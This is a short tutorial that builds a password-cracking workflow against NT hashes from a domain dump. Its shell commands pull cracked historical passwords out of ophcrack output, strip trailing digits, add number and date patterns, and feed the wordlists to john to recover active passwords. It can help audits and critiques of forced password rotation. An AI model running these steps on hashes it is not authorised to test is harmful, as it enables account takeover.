# Attacking user behaviour as a consequence of forced regular password change

Let's assume using [ophcrack](https://ophcrack.sourceforge.io/) for cracking NT hashes in pwdump format where the pwdump includes password history hashes also. Assume we have cracked several hashes in the history.

Steps for getting more passwords cracked (assuming users just increase/decrease/edit numbers at the end of their passwords on regular forced password change by policy):

1. Get cracked passwords (including history):

```bash
cat ophcrack.pwdump | grep -v ':::$' | awk -F: '{ print $7 }' | sort -u > wordlist_ophcracked.txt
```

2. Feed it to [john](https://www.openwall.com/john/):

```bash
john secretsdump.ntds.pwdump --format=nt --wordlist=wordlist_ophcracked.txt
```

3. Strip the numbers at the ending:

```bash
cat wordlist_ophcracked.txt | sed -e 's/[0-9]*$//' | sort -u > wordlist_ophcracked_base.txt
```

4. Generate some common patterns (feel free to include more):

```bash
for i in `seq 1 1000` ; do echo $i ; done > num_1.txt
for i in `seq 1 9999` ; do printf "%04d\n" $i ; done > num_2.txt
for i in `seq 1 99` ; do printf "%02d\n" $i ; done > num_3.txt
for i in `seq 1 365` ; do date --date "2000-01-01 +$i day" +'%m%d' ; done > num_4.txt

cat num_*.txt | sort -u > num.txt
```

5. Combine the number patterns with the base words (could be slow, but at least it is a one-liner :) ):

```bash
while read w ; do while read n ; do echo $w$n ; done < num.txt ; done < wordlist_ophcracked_base.txt > wordlist_ophcracked_combined.txt
```

6. Attack the hashes with the combined wordlist:

```bash
john secretsdump.ntds.pwdump --format=nt --wordlist=wordlist_ophcracked_combined.txt
```

The result should include much more cracked passwords, not only history, but active passwords.

That's all about forced password change by policy and user behaviour.